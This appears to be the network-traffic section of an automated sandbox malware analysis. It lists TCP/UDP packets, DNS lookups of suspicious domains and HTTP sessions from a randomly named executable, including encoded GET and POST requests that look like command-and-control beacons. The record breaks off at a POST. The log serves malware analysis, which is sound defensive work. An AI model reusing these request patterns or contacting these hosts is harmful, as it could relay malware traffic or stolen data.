                                                            Dec 5, 2024 19:40:22.092643976 CET8049872104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:22.092724085 CET4987280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:22.955240011 CET4988080192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:23.075930119 CET8049880104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:23.079726934 CET4988080192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:23.094743967 CET4988080192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:23.214601994 CET8049880104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:24.608338118 CET4988080192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:24.728915930 CET8049880104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:24.729041100 CET4988080192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:25.627300024 CET4988680192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:25.748466015 CET8049886104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:25.748620033 CET4988680192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:25.763094902 CET4988680192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:25.882894039 CET8049886104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:25.882982969 CET8049886104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:27.264616013 CET4988680192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:27.384884119 CET8049886104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:27.385047913 CET4988680192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:28.283328056 CET4989280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:28.403343916 CET8049892104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:40:28.403434992 CET4989280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:28.420234919 CET4989280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:40:28.540129900 CET8049892104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:41:08.347903967 CET8049892104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:41:08.348505974 CET8049892104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:41:08.348736048 CET4989280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:41:08.351520061 CET4989280192.168.2.7104.21.41.74
                                                            Dec 5, 2024 19:41:08.471679926 CET8049892104.21.41.74192.168.2.7
                                                            Dec 5, 2024 19:41:14.459844112 CET4998480192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:14.579772949 CET804998485.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:14.579875946 CET4998480192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:14.595369101 CET4998480192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:14.715326071 CET804998485.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:16.108628035 CET4998480192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:16.228933096 CET804998485.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:16.229176044 CET4998480192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:17.127412081 CET4998580192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:17.247215986 CET804998585.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:17.247488976 CET4998580192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:17.262343884 CET4998580192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:17.382124901 CET804998585.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:18.770880938 CET4998580192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:18.903022051 CET804998585.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:18.903187037 CET4998580192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:19.786468983 CET4998680192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:19.906366110 CET804998685.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:19.906455040 CET4998680192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:19.923261881 CET4998680192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:20.043070078 CET804998685.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:20.043354988 CET804998685.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:21.436794043 CET4998680192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:21.559083939 CET804998685.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:21.559264898 CET4998680192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:22.455673933 CET4998780192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:22.576087952 CET804998785.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:22.576292992 CET4998780192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:22.591773987 CET4998780192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:22.712162018 CET804998785.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:23.933490038 CET804998785.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:23.933620930 CET804998785.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:23.933756113 CET4998780192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:23.936492920 CET4998780192.168.2.785.159.66.93
                                                            Dec 5, 2024 19:41:24.056232929 CET804998785.159.66.93192.168.2.7
                                                            Dec 5, 2024 19:41:29.737926006 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:29.858040094 CET8049988103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:29.858234882 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:29.873936892 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:29.993849039 CET8049988103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:31.389982939 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:31.426230907 CET8049988103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:31.426390886 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:31.426459074 CET8049988103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:31.426529884 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:31.509979963 CET8049988103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:31.513967037 CET4998880192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:32.408885002 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:32.528760910 CET8049989103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:32.529073000 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:32.545327902 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:32.665510893 CET8049989103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:34.061876059 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:34.089931965 CET8049989103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:34.090142012 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:34.090292931 CET8049989103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:34.090351105 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:34.183607101 CET8049989103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:34.183702946 CET4998980192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:35.080739975 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:35.200630903 CET8049990103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:35.200846910 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:35.215956926 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:35.336159945 CET8049990103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:35.336194038 CET8049990103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:36.718050003 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:36.764065981 CET8049990103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:36.764178038 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:36.764261961 CET8049990103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:36.764324903 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:36.837835073 CET8049990103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:36.837924004 CET4999080192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:37.736789942 CET4999180192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:37.856492996 CET8049991103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:37.856643915 CET4999180192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:37.865684032 CET4999180192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:37.985367060 CET8049991103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:39.431226969 CET8049991103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:39.431349039 CET8049991103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:39.431492090 CET4999180192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:39.434201956 CET4999180192.168.2.7103.21.221.4
                                                            Dec 5, 2024 19:41:39.554410934 CET8049991103.21.221.4192.168.2.7
                                                            Dec 5, 2024 19:41:44.778995037 CET4999280192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:44.899197102 CET8049992104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:44.899302959 CET4999280192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:44.915376902 CET4999280192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:45.035166979 CET8049992104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:46.204044104 CET8049992104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:46.204348087 CET8049992104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:46.204411030 CET4999280192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:46.206196070 CET8049992104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:46.206268072 CET4999280192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:46.421387911 CET4999280192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:47.439605951 CET4999380192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:47.559537888 CET8049993104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:47.559889078 CET4999380192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:47.574449062 CET4999380192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:47.694302082 CET8049993104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:48.859019041 CET8049993104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:48.859036922 CET8049993104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:48.859134912 CET4999380192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:48.861016989 CET8049993104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:48.861073017 CET4999380192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:49.077764988 CET4999380192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:50.097831011 CET4999480192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:50.217686892 CET8049994104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:50.217804909 CET4999480192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:50.233740091 CET4999480192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:50.353487968 CET8049994104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:50.353548050 CET8049994104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:51.521243095 CET8049994104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:51.521261930 CET8049994104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:51.521274090 CET8049994104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:51.521368027 CET4999480192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:51.749533892 CET4999480192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:52.767980099 CET4999580192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:52.889880896 CET8049995104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:52.889991999 CET4999580192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:52.899048090 CET4999580192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:53.022644043 CET8049995104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:54.185230017 CET8049995104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:54.185266972 CET8049995104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:54.185381889 CET4999580192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:54.186021090 CET8049995104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:54.186070919 CET4999580192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:54.188178062 CET4999580192.168.2.7104.21.62.184
                                                            Dec 5, 2024 19:41:54.307986021 CET8049995104.21.62.184192.168.2.7
                                                            Dec 5, 2024 19:41:59.790096998 CET4999680192.168.2.766.29.137.10
                                                            Dec 5, 2024 19:41:59.909948111 CET804999666.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:41:59.910120010 CET4999680192.168.2.766.29.137.10
                                                            Dec 5, 2024 19:41:59.925052881 CET4999680192.168.2.766.29.137.10
                                                            Dec 5, 2024 19:42:00.044919014 CET804999666.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:01.171619892 CET804999666.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:01.171672106 CET804999666.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:01.171684027 CET804999666.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:01.171721935 CET4999680192.168.2.766.29.137.10
                                                            Dec 5, 2024 19:42:01.171926022 CET804999666.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:01.171941042 CET804999666.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:01.171977043 CET4999680192.168.2.766.29.137.10
                                                            Dec 5, 2024 19:42:01.172236919 CET804999666.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:01.172277927 CET4999680192.168.2.766.29.137.10
                                                            Dec 5, 2024 19:42:01.437160015 CET4999680192.168.2.766.29.137.10
                                                            Dec 5, 2024 19:42:02.455667019 CET4999780192.168.2.766.29.137.10
                                                            Dec 5, 2024 19:42:02.575558901 CET804999766.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:02.575675011 CET4999780192.168.2.766.29.137.10
                                                            Dec 5, 2024 19:42:02.592125893 CET4999780192.168.2.766.29.137.10
                                                            Dec 5, 2024 19:42:02.711925983 CET804999766.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:03.802515030 CET804999766.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:03.802571058 CET804999766.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:03.802583933 CET804999766.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:03.802699089 CET804999766.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:03.802757978 CET4999780192.168.2.766.29.137.10
                                                            Dec 5, 2024 19:42:03.803075075 CET4999780192.168.2.766.29.137.10
                                                            Dec 5, 2024 19:42:03.803081036 CET804999766.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:03.803159952 CET804999766.29.137.10192.168.2.7
                                                            Dec 5, 2024 19:42:03.806210041 CET4999780192.168.2.766.29.137.10
                                                            Dec 5, 2024 19:42:04.671768904 CET4999780192.168.2.766.29.137.10

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 5, 2024 19:39:31.759701967 CET6017653192.168.2.71.1.1.1
                                                            Dec 5, 2024 19:39:32.152839899 CET53601761.1.1.1192.168.2.7
                                                            Dec 5, 2024 19:39:48.658642054 CET5395953192.168.2.71.1.1.1
                                                            Dec 5, 2024 19:39:49.249794960 CET53539591.1.1.1192.168.2.7
                                                            Dec 5, 2024 19:40:03.621033907 CET4941953192.168.2.71.1.1.1
                                                            Dec 5, 2024 19:40:04.608491898 CET4941953192.168.2.71.1.1.1
                                                            Dec 5, 2024 19:40:05.192723036 CET53494191.1.1.1192.168.2.7
                                                            Dec 5, 2024 19:40:05.192742109 CET53494191.1.1.1192.168.2.7
                                                            Dec 5, 2024 19:40:19.973690987 CET5104153192.168.2.71.1.1.1
                                                            Dec 5, 2024 19:40:20.294769049 CET53510411.1.1.1192.168.2.7
                                                            Dec 5, 2024 19:41:13.363192081 CET6088953192.168.2.71.1.1.1
                                                            Dec 5, 2024 19:41:14.374567032 CET6088953192.168.2.71.1.1.1
                                                            Dec 5, 2024 19:41:14.456975937 CET53608891.1.1.1192.168.2.7
                                                            Dec 5, 2024 19:41:14.512089014 CET53608891.1.1.1192.168.2.7
                                                            Dec 5, 2024 19:41:28.956259966 CET4916253192.168.2.71.1.1.1
                                                            Dec 5, 2024 19:41:29.735240936 CET53491621.1.1.1192.168.2.7
                                                            Dec 5, 2024 19:41:44.440459967 CET6389953192.168.2.71.1.1.1
                                                            Dec 5, 2024 19:41:44.776254892 CET53638991.1.1.1192.168.2.7
                                                            Dec 5, 2024 19:41:59.205957890 CET6117353192.168.2.71.1.1.1
                                                            Dec 5, 2024 19:41:59.787003040 CET53611731.1.1.1192.168.2.7

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 5, 2024 19:39:31.759701967 CET192.168.2.71.1.1.10xcb91Standard query (0)www.aziziyeescortg.xyzA (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:39:48.658642054 CET192.168.2.71.1.1.10x71c2Standard query (0)www.grandesofertas.funA (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:40:03.621033907 CET192.168.2.71.1.1.10x3507Standard query (0)www.sankan-fukushi.infoA (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:40:04.608491898 CET192.168.2.71.1.1.10x3507Standard query (0)www.sankan-fukushi.infoA (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:40:19.973690987 CET192.168.2.71.1.1.10xd617Standard query (0)www.conansog.shopA (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:41:13.363192081 CET192.168.2.71.1.1.10xf1ddStandard query (0)www.beythome.onlineA (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:41:14.374567032 CET192.168.2.71.1.1.10xf1ddStandard query (0)www.beythome.onlineA (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:41:28.956259966 CET192.168.2.71.1.1.10x62afStandard query (0)www.tempatmudisini06.clickA (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:41:44.440459967 CET192.168.2.71.1.1.10xdf88Standard query (0)www.questmatch.proA (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:41:59.205957890 CET192.168.2.71.1.1.10xfed7Standard query (0)www.callyur.shopA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 5, 2024 19:39:32.152839899 CET1.1.1.1192.168.2.70xcb91No error (0)www.aziziyeescortg.xyz104.21.77.71A (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:39:32.152839899 CET1.1.1.1192.168.2.70xcb91No error (0)www.aziziyeescortg.xyz172.67.205.93A (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:39:49.249794960 CET1.1.1.1192.168.2.70x71c2No error (0)www.grandesofertas.funentri-domains.clickmax.ioCNAME (Canonical name)IN (0x0001)false
                                                            Dec 5, 2024 19:39:49.249794960 CET1.1.1.1192.168.2.70x71c2No error (0)entri-domains.clickmax.iossl.goentri.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 5, 2024 19:39:49.249794960 CET1.1.1.1192.168.2.70x71c2No error (0)ssl.goentri.com13.248.221.243A (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:39:49.249794960 CET1.1.1.1192.168.2.70x71c2No error (0)ssl.goentri.com76.223.74.74A (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:40:05.192723036 CET1.1.1.1192.168.2.70x3507No error (0)www.sankan-fukushi.info163.44.185.183A (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:40:05.192742109 CET1.1.1.1192.168.2.70x3507No error (0)www.sankan-fukushi.info163.44.185.183A (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:40:20.294769049 CET1.1.1.1192.168.2.70xd617No error (0)www.conansog.shop104.21.41.74A (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:40:20.294769049 CET1.1.1.1192.168.2.70xd617No error (0)www.conansog.shop172.67.162.12A (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:41:14.456975937 CET1.1.1.1192.168.2.70xf1ddNo error (0)www.beythome.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 5, 2024 19:41:14.456975937 CET1.1.1.1192.168.2.70xf1ddNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 5, 2024 19:41:14.456975937 CET1.1.1.1192.168.2.70xf1ddNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:41:14.512089014 CET1.1.1.1192.168.2.70xf1ddNo error (0)www.beythome.onlineredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 5, 2024 19:41:14.512089014 CET1.1.1.1192.168.2.70xf1ddNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                            Dec 5, 2024 19:41:14.512089014 CET1.1.1.1192.168.2.70xf1ddNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:41:29.735240936 CET1.1.1.1192.168.2.70x62afNo error (0)www.tempatmudisini06.clicktempatmudisini06.clickCNAME (Canonical name)IN (0x0001)false
                                                            Dec 5, 2024 19:41:29.735240936 CET1.1.1.1192.168.2.70x62afNo error (0)tempatmudisini06.click103.21.221.4A (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:41:44.776254892 CET1.1.1.1192.168.2.70xdf88No error (0)www.questmatch.pro104.21.62.184A (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:41:44.776254892 CET1.1.1.1192.168.2.70xdf88No error (0)www.questmatch.pro172.67.138.37A (IP address)IN (0x0001)false
                                                            Dec 5, 2024 19:41:59.787003040 CET1.1.1.1192.168.2.70xfed7No error (0)www.callyur.shopcallyur.shopCNAME (Canonical name)IN (0x0001)false
                                                            Dec 5, 2024 19:41:59.787003040 CET1.1.1.1192.168.2.70xfed7No error (0)callyur.shop66.29.137.10A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.aziziyeescortg.xyz
                                                            • www.grandesofertas.fun
                                                            • www.sankan-fukushi.info
                                                            • www.conansog.shop
                                                            • www.beythome.online
                                                            • www.tempatmudisini06.click
                                                            • www.questmatch.pro
                                                            • www.callyur.shop

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.749753104.21.77.71806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:39:32.291562080 CET555OUTGET /wbcb/?wVb0=RE7vYLyK5TU4QOP5rF5bzHvmkOBzPkLWFqcdQsIlKut3OUPHwC3RgbbGtWJhBdiGOnYKFKB5mJuPEPmtM8O0K3O6A/B6pmA5xGmAOUvp0kuEyHznIJjgzI6sNmSk1vDMl2v3exemO24i&0r=XzjtrBPP HTTP/1.1
                                                            Host: www.aziziyeescortg.xyz
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                            Dec 5, 2024 19:39:33.609416008 CET1121INHTTP/1.1 404 Not Found
                                                            Date: Thu, 05 Dec 2024 18:39:33 GMT
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=36ws1lCkjiKO0ZV4eViArTQK3vRWHTs2nG1AnsOiSIeRVTq556BXw%2BWBStqVgc5GM9HnEvtCInPQCU4Kny%2Fd44GCNTrvHSeTJIMUBuF5btHW1WzOMKOuCqNEEJ8fLVrQ5d%2BJFFamZNe8"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ed628d889210f93-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1585&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=555&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.74979013.248.221.243806992C:\Program Files (x86)\OidBTsUKLUKiiwvitrQNKCDkFRQaegayMQDzODvEbZTZQXAbazHAW\lDBisuvfBkK.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 5, 2024 19:39:49.388859987 CET832OUTPOST /5rfk/ HTTP/1.1
                                                            Host: www.grandesofertas.fun
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Connection: close
                                                            Content-Length: 217
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.grandesofertas.fun
                                                            Referer: http://www.grandesofertas.fun/5rfk/
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
